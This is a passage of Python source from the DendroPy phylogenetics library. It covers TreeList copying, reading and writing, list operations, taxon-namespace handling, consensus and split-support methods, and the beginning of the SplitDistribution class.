                for aidx, a in enumerate(args[0]):
                    if not isinstance(a, self.tree_type):
                        raise ValueError("Cannot add object not of 'Tree' type to 'TreeList'")
                    self.append(a)
        if kwargs:
            raise TypeError("Unrecognized or unsupported arguments: {}".format(kwargs))
    def __hash__(self):
        # Deliberate identity-based hash: TreeList is a mutable container, so
        # hashing by value would be unsafe. Note this intentionally diverges
        # from the value-based __eq__ below (equal lists may hash differently).
        return id(self)
def __eq__(self, other):
return (
isinstance(other, TreeList)
and (self.taxon_namespace is other.taxon_namespace)
and (self._trees == other._trees)
)
    def _clone_from(self, tree_list, kwargs_dict):
        """
        (Re)initializes ``self`` as a copy of ``tree_list``: trees are
        deep-copied, while the taxon namespace and taxa are shared (or, if a
        different ``taxon_namespace`` is given in ``kwargs_dict``, mapped onto
        equivalently-labeled taxa in that namespace). Returns ``self``.
        """
        memo = {}
        # memo[id(tree)] = self
        taxon_namespace = taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs_dict, tree_list.taxon_namespace)
        # Seed the deepcopy memo so the namespace itself is never cloned.
        memo[id(tree_list.taxon_namespace)] = taxon_namespace
        if taxon_namespace is not tree_list.taxon_namespace:
            # Map each source taxon to a same-labeled taxon in the target
            # namespace (creating it if necessary).
            for t1 in tree_list.taxon_namespace:
                t2 = taxon_namespace.require_taxon(label=t1.label)
                memo[id(t1)] = t2
        else:
            # Same namespace: each taxon maps to itself, so deepcopy reuses
            # the existing Taxon objects instead of cloning them.
            for t1 in tree_list.taxon_namespace:
                memo[id(t1)] = t1
        t = copy.deepcopy(tree_list, memo)
        # Adopt the copy's state wholesale, then apply any label override.
        self.__dict__ = t.__dict__
        self.label = kwargs_dict.pop("label", tree_list.label)
        return self
def __copy__(self):
other = TreeList(label=self.label, taxon_namespace=self.taxon_namespace)
other._trees = list(self._trees)
memo = {}
memo[id(self)] = other
other.deep_copy_annotations_from(self, memo)
return other
def taxon_namespace_scoped_copy(self, memo=None):
if memo is None:
memo = {}
# this populates ``memo`` with references to the
# the TaxonNamespace and Taxon objects
self.taxon_namespace.populate_memo_for_taxon_namespace_scoped_copy(memo)
return self.__deepcopy__(memo=memo)
    def __deepcopy__(self, memo=None):
        # Delegate to the Annotable base implementation; objects pre-seeded in
        # ``memo`` (e.g. taxa, via taxon_namespace_scoped_copy) are reused
        # rather than cloned.
        return basemodel.Annotable.__deepcopy__(self, memo=memo)
###########################################################################
### Representation
def __str__(self):
return "<TreeList {} '{}': [{}]>".format(hex(id(self)), self.label, ", ".join(repr(i) for i in self._trees))
###########################################################################
### Data I/O
def _taxon_namespace_pseudofactory(self, **kwargs):
"""
Dummy factory to coerce all |TaxonNamespace| objects required when
parsing a data source to reference ``self.taxon_namespace``.
"""
if "label" in kwargs and kwargs["label"] is not None and self.taxon_namespace.label is None:
self.taxon_namespace.label = kwargs["label"]
return self.taxon_namespace
def _tree_list_pseudofactory(self, **kwargs):
    """
    Dummy factory to coerce all |TreeList| objects required when parsing
    a data source to reference ``self``, adopting the parsed label if we
    do not have one yet.
    """
    label = kwargs.get("label")
    if label is not None and self.label is None:
        self.label = label
    return self
def _parse_and_add_from_stream(self,
        stream,
        schema,
        collection_offset=None,
        tree_offset=None,
        **kwargs):
    """
    Parses |Tree| objects from data source and adds to this collection.

    Notes
    -----
    *All* operational taxonomic unit concepts in the data source will be included
    in the |TaxonNamespace| object associated with the new
    |TreeList| object and its contained |Tree| objects, even those
    not associated with trees or the particular trees being retrieved.

    Parameters
    ----------
    stream : file or file-like object
        Source of data.
    schema : string
        Identifier of format of data in ``stream``.
    collection_offset : integer or None
        0-based index indicating collection of trees to parse. If |None|,
        then all tree collections are retrieved, with each distinct
        collection parsed into a separate |TreeList| object. If the
        tree colleciton offset index is equal or greater than the number of
        tree collections in the data source, then IndexError is raised.
        Negative offsets work like negative list indexes; e.g., a
        ``collection_offset`` of -1 means to read the last collection of
        trees in the data source. For data formats that do not support the
        concept of distinct tree collections (e.g. NEWICK) are considered
        single-collection data source (i.e, the only acceptable
        ``collection_offset`` values are -1 or 0).
    tree_offset : integer or None
        0-based index indicating particular tree within a particular
        collection of trees at which to begin reading. If not specified or
        |None| (default), then all trees are parsed. Otherwise, must be an
        integer value up the length of the collection minus 1. A positive
        offset indicates the number of trees in the collection to skip;
        e.g. a ``tree_offset`` of 20 means to skip the first 20 trees in the
        collection. Negative offsets work like negative list indexes;
        e.g., a ``tree_offset`` value of -10 means to retrieve the last 10
        trees in the collection. If the tree offset index is equal or
        greater than the number of trees in the collection, then IndexError
        is raised. Requires that a particular tree collection has been
        identified using the ``tree_collection_offset`` parameter: if
        ``tree_collection_offset`` is not specified, a TypeError is raised.
    \*\*kwargs : keyword arguments
        Arguments to customize parsing, instantiation, processing, and
        accession of |Tree| objects read from the data source, including
        schema- or format-specific handling. These will be passed to the
        underlying schema-specific reader for handling.

        General (schema-agnostic) keyword arguments are:

            * ``rooted`` specifies the default rooting interpretation of the tree.
            * ``edge_length_type`` specifies the type of the edge lengths (int or
              float; defaults to 'float')

        Other keyword arguments are available depending on the schema. See
        specific schema handlers (e.g., `NewickReader`, `NexusReader`,
        `NexmlReader`) for more details.

    Notes
    -----
    Note that in most cases, even if ``collection_offset`` and ``tree_offset``
    are specified to restrict the trees read, the *entire* data source
    is still parsed and processed. So this is not more efficient than
    reading all the trees and then manually-extracting them later; just
    more convenient. If you need just a single subset of trees from a data
    source, there is no gain in efficiency. If you need multiple trees or
    subsets of trees from the same data source, it would be much more
    efficient to read the entire data source, and extract trees as needed.

    Returns
    -------
    n : ``int``
        The number of |Tree| objects read.
    """
    if "taxon_namespace" in kwargs and kwargs['taxon_namespace'] is not self.taxon_namespace:
        raise TypeError("Cannot change ``taxon_namespace`` when reading into an existing TreeList")
    # Coerce the reader into using this list's namespace and this list
    # itself as the destination container.
    kwargs["taxon_namespace"] = self.taxon_namespace
    kwargs["tree_list"] = self
    cur_size = len(self._trees)
    TreeList._parse_and_create_from_stream(
            stream=stream,
            schema=schema,
            collection_offset=collection_offset,
            tree_offset=tree_offset,
            **kwargs)
    # Report how many trees this parse appended.
    new_size = len(self._trees)
    return new_size - cur_size
def read(self, **kwargs):
    """
    Add |Tree| objects to existing |TreeList| from data source providing
    one or more collections of trees.

    **Mandatory Source-Specification Keyword Argument (Exactly One Required):**

        - **file** (*file*) -- File or file-like object of data opened for reading.
        - **path** (*str*) -- Path to file of data.
        - **url** (*str*) -- URL of data.
        - **data** (*str*) -- Data given directly.

    **Mandatory Schema-Specification Keyword Argument:**

        - **schema** (*str*) -- Identifier of format of data given by the
          "``file``", "``path``", "``data``", or "``url``" argument
          specified above: ":doc:`newick </schemas/newick>`", ":doc:`nexus
          </schemas/nexus>`", or ":doc:`nexml </schemas/nexml>`". See
          "|Schemas|" for more details.

    **Optional General Keyword Arguments:**

        - **collection_offset** (*int*) -- 0-based index of tree block or
          collection in source to be parsed. If not specified then the
          first collection (offset = 0) is assumed.
        - **tree_offset** (*int*) -- 0-based index of first tree within the
          collection specified by ``collection_offset`` to be parsed (i.e.,
          skipping the first ``tree_offset`` trees). If not
          specified, then the first tree (offset = 0) is assumed (i.e., no
          trees within the specified collection will be skipped). Use this
          to specify, e.g. a burn-in.
        - **ignore_unrecognized_keyword_arguments** (*bool*) -- If |True|,
          then unsupported or unrecognized keyword arguments will not
          result in an error. Default is |False|: unsupported keyword
          arguments will result in an error.

    **Optional Schema-Specific Keyword Arguments:**

        These provide control over how the data is interpreted and
        processed, and supported argument names and values depend on
        the schema as specified by the value passed as the "``schema``"
        argument. See "|Schemas|" for more details.

    **Examples:**

    ::

        tlist = dendropy.TreeList()
        tlist.read(
                file=open('treefile.tre', 'rU'),
                schema="newick",
                tree_offset=100)
        tlist.read(
                path='sometrees.nexus',
                schema="nexus",
                collection_offset=2,
                tree_offset=100)
        tlist.read(
                data="((A,B),(C,D));((A,C),(B,D));",
                schema="newick")
        tlist.read(
                url="http://api.opentreeoflife.org/v2/study/pg_1144/tree/tree2324.nex",
                schema="nexus")

    """
    # Source/schema keyword handling is delegated to MultiReadable;
    # parsing ultimately routes through _parse_and_add_from_stream().
    return basemodel.MultiReadable._read_from(self, **kwargs)
def _format_and_write_to_stream(self, stream, schema, **kwargs):
    """
    Writes out ``self`` in ``schema`` format to a destination given by
    file-like object ``stream``.

    Parameters
    ----------
    stream : file or file-like object
        Destination for data.
    schema : string
        Must be a recognized and tree file schema, such as "nexus",
        "newick", etc, for which a specialized tree list writer is
        available. If this is not implemented for the schema specified, then
        a UnsupportedSchemaError is raised.
    \*\*kwargs : keyword arguments, optional
        Keyword arguments will be passed directly to the writer for the
        specified schema. See documentation for details on keyword
        arguments supported by writers of various schemas.
    """
    # Look up the schema-specific writer and hand it this collection.
    writer = dataio.get_writer(schema, **kwargs)
    writer.write_tree_list(self, stream)
###########################################################################
### List Interface
def _import_tree_to_taxon_namespace(self,
        tree,
        taxon_import_strategy="migrate",
        **kwargs):
    """
    Bring ``tree`` into ``self.taxon_namespace`` and return it.

    With the "migrate" strategy, the tree's taxa are remapped by label
    (extra keyword arguments are forwarded to
    ``migrate_taxon_namespace()``); with "add", the tree simply adopts
    this namespace and registers any taxa not already present. Any other
    strategy raises ValueError. A tree already using this namespace is
    returned untouched.
    """
    if tree.taxon_namespace is self.taxon_namespace:
        return tree
    if taxon_import_strategy == "migrate":
        tree.migrate_taxon_namespace(taxon_namespace=self.taxon_namespace, **kwargs)
    elif taxon_import_strategy == "add":
        tree._taxon_namespace = self.taxon_namespace
        tree.update_taxon_namespace()
    else:
        raise ValueError("Unrecognized taxon import strategy: '{}'".format(taxon_import_strategy))
    # assert tree.taxon_namespace is self.taxon_namespace
    return tree
def insert(self,
        index,
        tree,
        taxon_import_strategy="migrate",
        **kwargs):
    """
    Inserts a |Tree| object, ``tree``, into the collection before
    ``index``.

    The |TaxonNamespace| reference of ``tree`` will be set to that of
    ``self``. Any |Taxon| objects associated with nodes in ``tree``
    that are not already in ``self.taxon_namespace`` will be handled
    according to ``taxon_import_strategy``:

    - 'migrate'
        |Taxon| objects associated with ``tree`` that are not already
        in ``self.taxon_namespace`` will be remapped based on their
        labels, with new :class|Taxon| objects being reconstructed if
        none with matching labels are found. Specifically,
        :meth:`dendropy.datamodel.treemodel.Tree.migrate_taxon_namespace()`
        will be called on ``tree``, where ``kwargs`` is as passed to
        this function.
    - 'add'
        |Taxon| objects associated with ``tree`` that are not already
        in ``self.taxon_namespace`` will be added. Note that this might
        result in |Taxon| objects with duplicate labels as no
        attempt at mapping to existing |Taxon| objects based on
        label-matching is done.

    Parameters
    ----------
    index : integer
        Position before which to insert ``tree``.
    tree : A |Tree| instance
        The |Tree| object to be added.
    taxon_import_strategy : string
        If ``tree`` is associated with a different |TaxonNamespace|,
        this argument determines how new |Taxon| objects in ``tree``
        are handled: 'migrate' or 'add'. See above for details.
    \*\*kwargs : keyword arguments
        These arguments will be passed directly to
        'migrate_taxon_namespace()' method call on ``tree``.

    See Also
    --------
    :meth:`Tree.migrate_taxon_namespace`
    """
    # Bring the tree into this list's namespace first, then insert.
    self._import_tree_to_taxon_namespace(
            tree=tree,
            taxon_import_strategy=taxon_import_strategy,
            **kwargs)
    self._trees.insert(index, tree)
def append(self,
        tree,
        taxon_import_strategy="migrate",
        **kwargs):
    """
    Adds a |Tree| object, ``tree``, to the collection.

    The |TaxonNamespace| reference of ``tree`` will be set to that of
    ``self``. Any |Taxon| objects associated with nodes in ``tree``
    that are not already in ``self.taxon_namespace`` will be handled
    according to ``taxon_import_strategy``:

    - 'migrate'
        |Taxon| objects associated with ``tree`` that are not already
        in ``self.taxon_namespace`` will be remapped based on their
        labels, with new :class|Taxon| objects being reconstructed if
        none with matching labels are found. Specifically,
        :meth:`dendropy.datamodel.treemodel.Tree.migrate_taxon_namespace()`
        will be called on ``tree``, where ``kwargs`` is as passed to this
        function.
    - 'add'
        |Taxon| objects associated with ``tree`` that are not already
        in ``self.taxon_namespace`` will be added. Note that this might
        result in |Taxon| objects with duplicate labels as no
        attempt at mapping to existing |Taxon| objects based on
        label-matching is done.

    Parameters
    ----------
    tree : A |Tree| instance
        The |Tree| object to be added.
    taxon_import_strategy : string
        If ``tree`` is associated with a different |TaxonNamespace|,
        this argument determines how new |Taxon| objects in ``tree``
        are handled: 'migrate' or 'add'. See above for details.
    \*\*kwargs : keyword arguments
        These arguments will be passed directly to
        'migrate_taxon_namespace()' method call on ``tree``.

    See Also
    --------
    :meth:`Tree.migrate_taxon_namespace`
    """
    # Bring the tree into this list's namespace first, then append.
    self._import_tree_to_taxon_namespace(
            tree=tree,
            taxon_import_strategy=taxon_import_strategy,
            **kwargs)
    self._trees.append(tree)
def extend(self, other):
    """
    In-place addition of |Tree| objects in ``other`` to ``self``.

    Trees coming from another |TreeList| are *copied* (via
    ``self.tree_type``) into ``self.taxon_namespace``; trees from any
    other iterable are migrated into ``self.taxon_namespace`` and
    appended directly.

    Parameters
    ----------
    other : iterable of |Tree| objects

    Returns
    -------
    ``self`` : |TreeList|
    """
    if isinstance(other, TreeList):
        for source_tree in other:
            copied_tree = self.tree_type(source_tree, taxon_namespace=self.taxon_namespace)
            self._trees.append(copied_tree)
    else:
        for source_tree in other:
            self.append(source_tree)
    return self
def __iadd__(self, other):
    """
    ``self += other``: delegates to :meth:`extend`. Trees from another
    |TreeList| are copied into ``self.taxon_namespace``; trees from any
    other iterable are migrated in and added directly.

    Parameters
    ----------
    other : iterable of |Tree| objects

    Returns
    -------
    ``self`` : |TreeList|
    """
    return self.extend(other)
def __add__(self, other):
    """
    ``self + other``: returns a new |TreeList| (sharing this list's
    |TaxonNamespace|) holding clones of the trees in ``self`` followed
    by the trees of ``other`` (cloned if ``other`` is a |TreeList|,
    otherwise migrated into the namespace and added directly).

    Parameters
    ----------
    other : iterable of |Tree| objects

    Returns
    -------
    tlist : |TreeList| object
        New |TreeList| containing clones of |Tree| objects in ``self``
        and ``other``.
    """
    combined = TreeList(taxon_namespace=self.taxon_namespace)
    combined.extend(self)
    combined.extend(other)
    return combined
def __contains__(self, tree):
    # Membership test against the underlying tree list.
    return tree in self._trees
def __delitem__(self, tree):
    # NOTE: despite the parameter name, this is an index or slice, as in
    # ``del some_list[i]`` — not a Tree instance.
    del self._trees[tree]
def __iter__(self):
    # Iterate over contained Tree objects in order.
    return iter(self._trees)
def __reversed__(self):
    # Iterate over contained Tree objects in reverse order.
    return reversed(self._trees)
def __len__(self):
    # Number of trees in the collection.
    return len(self._trees)
def __getitem__(self, index):
    """
    If ``index`` is an integer, then |Tree| object at position ``index``
    is returned. If ``index`` is a slice, then a |TreeList| is returned
    with references (i.e., not copies or clones, but the actual original
    instances themselves) to |Tree| objects in the positions given
    by the slice. The |TaxonNamespace| is the same as ``self``.

    Parameters
    ----------
    index : integer or slice
        Index or slice.

    Returns
    -------
    t : |Tree| object or |TreeList| object
    """
    if isinstance(index, slice):
        r = self._trees[index]
        # Wrap the sliced sublist in a new TreeList sharing this
        # list's namespace; trees are shared, not cloned.
        return TreeList(r,
                taxon_namespace=self.taxon_namespace)
    else:
        return self._trees[index]
def __setitem__(self, index, value):
    """
    Replace the tree(s) at ``index``.

    For a slice, ``value`` must be an iterable of trees: trees coming
    from another |TreeList| are *copied* (via ``self.tree_type``) into
    ``self.taxon_namespace``, while trees from any other iterable are
    migrated in place. For a plain index, the single tree is migrated
    into ``self.taxon_namespace`` before assignment.
    """
    if isinstance(index, slice):
        if isinstance(value, TreeList):
            # Copy each tree into this list's namespace.
            tt = []
            for t0 in value:
                t1 = self.tree_type(t0,
                        taxon_namespace=self.taxon_namespace)
                tt.append(t1)
            value = tt
        else:
            # Migrate the original tree objects in place.
            for t in value:
                self._import_tree_to_taxon_namespace(t)
        self._trees[index] = value
    else:
        self._trees[index] = self._import_tree_to_taxon_namespace(value)
def clear(self):
    # list.clear() only with 3.4 or so ...
    self._trees = []
def index(self, tree):
    # Position of ``tree`` in the collection; raises ValueError if absent.
    return self._trees.index(tree)
def pop(self, index=-1):
    # Remove and return the tree at ``index`` (last tree by default).
    return self._trees.pop(index)
def remove(self, tree):
    # Remove the first occurrence of ``tree``; raises ValueError if absent.
    self._trees.remove(tree)
def reverse(self):
    # In-place reversal of tree order.
    self._trees.reverse()
def sort(self, key=None, reverse=False):
    # In-place stable sort, with the same semantics as list.sort().
    self._trees.sort(key=key, reverse=reverse)
def new_tree(self, *args, **kwargs):
    """
    Create a new tree, append it to this collection, and return it.

    The tree is constructed with ``self.tree_type`` when one is set,
    otherwise with ``self.tree_factory``. A ``taxon_namespace`` keyword,
    if given, must be this list's namespace; otherwise TypeError is
    raised.
    """
    resolved_tns = taxonmodel.process_kwargs_dict_for_taxon_namespace(kwargs, self.taxon_namespace)
    if resolved_tns is not self.taxon_namespace:
        raise TypeError("Cannot create new Tree with different TaxonNamespace")
    kwargs["taxon_namespace"] = self.taxon_namespace
    constructor = self.tree_type if self.tree_type is not None else self.tree_factory
    created_tree = constructor(*args, **kwargs)
    self._trees.append(created_tree)
    return created_tree
##############################################################################
## Taxon Handling
def reconstruct_taxon_namespace(self,
        unify_taxa_by_label=True,
        taxon_mapping_memo=None):
    """
    Repoint each contained tree at ``self.taxon_namespace`` and remap
    its taxa into that namespace (unifying by label when
    ``unify_taxa_by_label`` is True). A single shared
    ``taxon_mapping_memo`` keeps the remapping consistent across all
    trees in the collection.
    """
    if taxon_mapping_memo is None:
        taxon_mapping_memo = {}
    for tree in self._trees:
        tree._taxon_namespace = self.taxon_namespace
        tree.reconstruct_taxon_namespace(
                unify_taxa_by_label=unify_taxa_by_label,
                taxon_mapping_memo=taxon_mapping_memo,
                )
def update_taxon_namespace(self):
    # Repoint each tree at this namespace and register any taxa on the
    # trees that the namespace does not yet contain (no label-based
    # remapping is performed).
    for tree in self._trees:
        tree._taxon_namespace = self.taxon_namespace
        tree.update_taxon_namespace()
def poll_taxa(self, taxa=None):
    """
    Return a set populated with all |Taxon| instances referenced by the
    trees in ``self``.

    Parameters
    ----------
    taxa : set()
        Set to populate. If not specified, a new one will be created.

    Returns
    -------
    taxa : set[|Taxon|]
        Set of taxa associated with ``self``.
    """
    collected = set() if taxa is None else taxa
    for tree in self:
        tree.poll_taxa(collected)
    return collected
def reindex_subcomponent_taxa(self):
    """
    Unsupported operation on this collection; always raises
    NotImplementedError.

    Bug fix: the original definition omitted the ``self`` parameter, so
    invoking it as an instance method raised TypeError (wrong argument
    count) instead of the intended NotImplementedError.
    """
    raise NotImplementedError()
##############################################################################
## Special Calculations and Operations on Entire Collection
def _get_tree_array(self,
        kwargs_dict,
        ):
    """
    Return TreeArray containing information of trees currently
    in self. Processes ``kwargs_dict`` intelligently: removing
    and passing on keyword arguments pertaining to TreeArray
    construction, and leaving everything else.

    Note that the pops below *mutate* the caller's ``kwargs_dict``:
    consumed keys are removed so the caller can forward the remainder
    elsewhere.
    """
    # TODO: maybe ignore_node_ages defaults to |False| but ``ultrametricity_precision`` defaults to 0?
    ta = TreeArray.from_tree_list(
            trees=self,
            # taxon_namespace=self.taxon_namespace,
            is_rooted_trees=kwargs_dict.pop("is_rooted_trees", None),
            ignore_edge_lengths=kwargs_dict.pop("ignore_edge_lengths", False),
            ignore_node_ages=kwargs_dict.pop("ignore_node_ages", True),
            use_tree_weights=kwargs_dict.pop("use_tree_weights", True),
            ultrametricity_precision=kwargs_dict.pop("ultrametricity_precision", constants.DEFAULT_ULTRAMETRICITY_PRECISION),
            is_force_max_age=kwargs_dict.pop("is_force_max_age", None),
            taxon_label_age_map=kwargs_dict.pop("taxon_label_age_map", None),
            is_bipartitions_updated=kwargs_dict.pop("is_bipartitions_updated", False)
            )
    return ta
def split_distribution(self,
        is_bipartitions_updated=False,
        default_edge_length_value=None,
        **kwargs):
    """
    Return `SplitDistribution` collecting information on splits in
    contained trees. Keyword arguments get passed directly to
    `SplitDistribution` constructor.

    Parameters
    ----------
    is_bipartitions_updated : bool
        If True, trees are assumed to already have up-to-date
        bipartition encodings.
    default_edge_length_value : numeric or None
        Value recorded in place of a missing edge length.
    """
    # NOTE(review): ``assert`` is stripped under ``python -O``; a
    # mismatched namespace would then fail later and less clearly.
    assert "taxon_namespace" not in kwargs or kwargs["taxon_namespace"] is self.taxon_namespace
    kwargs["taxon_namespace"] = self.taxon_namespace
    sd = SplitDistribution(**kwargs)
    for tree in self:
        sd.count_splits_on_tree(
                tree=tree,
                is_bipartitions_updated=is_bipartitions_updated,
                default_edge_length_value=default_edge_length_value)
    return sd
def as_tree_array(self, **kwargs):
    """
    Return |TreeArray| collecting information on splits in contained
    trees. Keyword arguments get passed directly to |TreeArray|
    constructor.
    """
    return TreeArray.from_tree_list(trees=self, **kwargs)
def consensus(self,
        min_freq=constants.GREATER_THAN_HALF,
        is_bipartitions_updated=False,
        summarize_splits=True,
        **kwargs):
    """
    Returns a consensus tree of all trees in self, with minimum frequency
    of bipartition to be added to the consensus tree given by ``min_freq``.
    """
    # _get_tree_array() pops the TreeArray-construction keywords out of
    # ``kwargs``; the remainder is forwarded to consensus_tree().
    ta = self._get_tree_array(kwargs)
    return ta.consensus_tree(min_freq=min_freq,
            summarize_splits=summarize_splits,
            **kwargs)
def maximum_product_of_split_support_tree(
        self,
        include_external_splits=False,
        score_attr="log_product_of_split_support"):
    """
    Return the tree with that maximizes the product of split supports, also
    known as the "Maximum Clade Credibility Tree" or MCCT.

    Parameters
    ----------
    include_external_splits : bool
        If |True|, then non-internal split posteriors will be included in
        the score. Defaults to |False|: these are skipped. This should only
        make a difference when dealing with splits collected from trees of
        different leaf sets.
    score_attr : str or None
        Name of attribute set on the returned tree holding its score;
        if None, no attribute is set.

    Returns
    -------
    mcct_tree : Tree
        Tree that maximizes the product of split supports.
    """
    ta = self._get_tree_array({})
    scores, max_score_tree_idx = ta.calculate_log_product_of_split_supports(
            include_external_splits=include_external_splits,
            )
    # Return the actual contained tree instance, optionally annotated
    # with its (log) score.
    tree = self[max_score_tree_idx]
    if score_attr is not None:
        setattr(tree, score_attr, scores[max_score_tree_idx])
    return tree
def maximum_sum_of_split_support_tree(
        self,
        include_external_splits=False,
        score_attr="sum_of_split_support"):
    """
    Return the tree with that maximizes the *sum* of split supports.

    Parameters
    ----------
    include_external_splits : bool
        If |True|, then non-internal split posteriors will be included in
        the score. Defaults to |False|: these are skipped. This should only
        make a difference when dealing with splits collected from trees of
        different leaf sets.
    score_attr : str or None
        Name of attribute set on the returned tree holding its score;
        if None, no attribute is set.

    Returns
    -------
    mcct_tree : Tree
        Tree that maximizes the sum of split supports.
    """
    ta = self._get_tree_array({})
    scores, max_score_tree_idx = ta.calculate_sum_of_split_supports(
            include_external_splits=include_external_splits,
            )
    # Return the actual contained tree instance, optionally annotated
    # with its score.
    tree = self[max_score_tree_idx]
    if score_attr is not None:
        setattr(tree, score_attr, scores[max_score_tree_idx])
    return tree
def frequency_of_bipartition(self, **kwargs):
    """
    Given a bipartition specified as:

        - a |Bipartition| instance given the keyword 'bipartition'
        - a split bitmask given the keyword 'split_bitmask'
        - a list of |Taxon| objects given with the keyword ``taxa``
        - a list of taxon labels given with the keyword ``labels``

    this function returns the proportion of trees in self
    in which the split is found.

    If the tree(s) in the collection are unrooted, then the bipartition
    will be normalized for the comparison.
    """
    split = None
    is_bipartitions_updated = kwargs.pop("is_bipartitions_updated", False)
    if "split_bitmask" in kwargs:
        split = kwargs["split_bitmask"]
    elif "bipartition" in kwargs:
        split = kwargs["bipartition"].split_bitmask
    elif "taxa" in kwargs or "labels" in kwargs:
        split = self.taxon_namespace.taxa_bitmask(**kwargs)
        # Sanity check: every requested taxon/label must map to a bit.
        if "taxa" in kwargs:
            k = len(kwargs["taxa"])
        else:
            k = len(kwargs["labels"])
        if bitprocessing.num_set_bits(split) != k:
            raise IndexError('Not all taxa could be mapped to bipartition (%s): %s' \
                % (self.taxon_namespace.bitmask_as_bitstring(split), k))
    else:
        raise TypeError("Need to specify one of the following keyword arguments: 'split_bitmask', 'bipartition', 'taxa', or 'labels'")
    # Unrooted trees are compared against the rotation-normalized form
    # of the bitmask; rooted trees against the raw bitmask.
    unnormalized_split = split
    normalized_split = treemodel.Bipartition.normalize_bitmask(
            bitmask=split,
            fill_bitmask=self.taxon_namespace.all_taxa_bitmask(),
            lowest_relevant_bit=1)
    found = 0
    total = 0
    for tree in self:
        if not is_bipartitions_updated or not tree.bipartition_encoding:
            tree.encode_bipartitions()
        bipartition_encoding = set(b.split_bitmask for b in tree.bipartition_encoding)
        total += 1
        if tree.is_unrooted and (normalized_split in bipartition_encoding):
            found += 1
        elif (not tree.is_unrooted) and (unnormalized_split in bipartition_encoding):
            found += 1
    try:
        return float(found)/total
    except ZeroDivisionError:
        # Empty collection: report a frequency of 0.
        return 0
def frequency_of_split(self, **kwargs):
    """
    DEPRECATED: use 'frequency_of_bipartition()' instead.
    """
    # Emit deprecation warning, then delegate unchanged.
    deprecate.dendropy_deprecation_warning(
            message="Deprecated since DendroPy 4: Instead of 'frequency_of_split()' use 'frequency_of_bipartition()'",
            stacklevel=4,
            )
    return self.frequency_of_bipartition(**kwargs)
###############################################################################
### SplitDistribution
class SplitDistribution(taxonmodel.TaxonNamespaceAssociated):
"""
Collects information regarding splits over multiple trees.
"""
SUMMARY_STATS_FIELDNAMES = ('mean', 'median', 'sd', 'hpd95', 'quant_5_95', 'range')
def __init__(self,
        taxon_namespace=None,
        ignore_edge_lengths=False,
        ignore_node_ages=True,
        use_tree_weights=True,
        ultrametricity_precision=constants.DEFAULT_ULTRAMETRICITY_PRECISION,
        is_force_max_age=False,
        taxon_label_age_map=None):
    """
    Parameters
    ----------
    taxon_namespace : |TaxonNamespace| or None
        Namespace shared by all trees to be counted.
    ignore_edge_lengths : bool
        If True, per-split edge lengths are not recorded.
    ignore_node_ages : bool
        If True (default), per-split node ages are not recorded.
    use_tree_weights : bool
        If True, each counted tree's ``weight`` scales its contribution.
    ultrametricity_precision : numeric
        Tolerance passed to ``calc_node_ages()`` when ages are recorded.
    is_force_max_age : bool
        Passed through to ``calc_node_ages()``.
    taxon_label_age_map : dict or None
        Optional mapping of taxon labels to leaf-node ages.
    """
    # Taxon Namespace
    taxonmodel.TaxonNamespaceAssociated.__init__(self,
            taxon_namespace=taxon_namespace)
    # configuration
    self.ignore_edge_lengths = ignore_edge_lengths
    self.ignore_node_ages = ignore_node_ages
    self.use_tree_weights = use_tree_weights
    self.ultrametricity_precision = ultrametricity_precision
    # storage/function
    self.total_trees_counted = 0  # number of trees tallied so far
    self.sum_of_tree_weights = 0.0  # accumulated (possibly weighted) tree total
    self.tree_rooting_types_counted = set()  # rooting states (True/False) observed
    self.split_counts = collections.defaultdict(float)  # split bitmask -> weighted count
    self.split_edge_lengths = collections.defaultdict(list)  # split bitmask -> edge lengths
    self.split_node_ages = collections.defaultdict(list)  # split bitmask -> node ages
    self.is_force_max_age = is_force_max_age
    self.is_force_min_age = False
    self.taxon_label_age_map = taxon_label_age_map
    # secondary/derived/generated/collected data
    self._is_rooted = False
    self._split_freqs = None  # lazily-computed split -> frequency map
    self._trees_counted_for_freqs = 0  # staleness marker for _split_freqs
    self._split_edge_length_summaries = None
    self._split_node_age_summaries = None
    self._trees_counted_for_summaries = 0
    # services
    self.tree_decorator = None
###########################################################################
### Utility
def normalize_bitmask(self, bitmask):
    """
    "Normalizes" split, by ensuring that the least-significant bit is
    always 1 (used on unrooted trees to establish split identity
    independent of rotation).

    Parameters
    ----------
    bitmask : integer
        Split bitmask hash to be normalized.

    Returns
    -------
    h : integer
        Normalized split bitmask.
    """
    # Delegates to Bipartition.normalize_bitmask() using this
    # namespace's full taxa bitmask as the fill mask.
    return treemodel.Bipartition.normalize_bitmask(
            bitmask=bitmask,
            fill_bitmask=self.taxon_namespace.all_taxa_bitmask(),
            lowest_relevant_bit=1)
###########################################################################
### Configuration
def _is_rooted_deprecation_warning(self):
    # Shared deprecation notice for the legacy rooting-state attributes.
    deprecate.dendropy_deprecation_warning(
            message="Deprecated since DendroPy 4: 'SplitDistribution.is_rooted' and 'SplitDistribution.is_unrooted' are no longer valid attributes; rooting state tracking and management is now the responsibility of client code.",
            stacklevel=4,
            )
def _get_is_rooted(self):
    self._is_rooted_deprecation_warning()
    return self._is_rooted
def _set_is_rooted(self, val):
    self._is_rooted_deprecation_warning()
    self._is_rooted = val
# DEPRECATED: reads/writes still work but emit a deprecation warning.
is_rooted = property(_get_is_rooted, _set_is_rooted)
def _get_is_unrooted(self):
    self._is_rooted_deprecation_warning()
    return not self._is_rooted
def _set_is_unrooted(self, val):
    self._is_rooted_deprecation_warning()
    self._is_rooted = not val
# DEPRECATED: logical complement of ``is_rooted``.
is_unrooted = property(_get_is_unrooted, _set_is_unrooted)
###########################################################################
### Split Counting and Book-Keeping
def add_split_count(self, split, count=1):
    # Directly increment the (weighted) tally for ``split``.
    self.split_counts[split] += count
def count_splits_on_tree(self,
        tree,
        is_bipartitions_updated=False,
        default_edge_length_value=None):
    """
    Counts splits in this tree and add to totals. ``tree`` must be decorated
    with splits, and no attempt is made to normalize taxa.

    Parameters
    ----------
    tree : a |Tree| object.
        The tree on which to count the splits.
    is_bipartitions_updated : bool
        If |False| [default], then the tree will have its splits encoded or
        updated. Otherwise, if |True|, then the tree is assumed to have its
        splits already encoded and updated.
    default_edge_length_value : numeric or None
        Value recorded in place of a missing edge length.

    Returns
    --------
    s : iterable of splits
        A list of split bitmasks from ``tree``.
    e :
        A list of edge length values from ``tree``.
    a :
        A list of node age values from ``tree``.
    """
    assert tree.taxon_namespace is self.taxon_namespace
    self.total_trees_counted += 1
    if not self.ignore_node_ages:
        # Leaf ages come from the taxon-label map when one is provided.
        if self.taxon_label_age_map:
            set_node_age_fn = self._set_node_age
        else:
            set_node_age_fn = None
        tree.calc_node_ages(
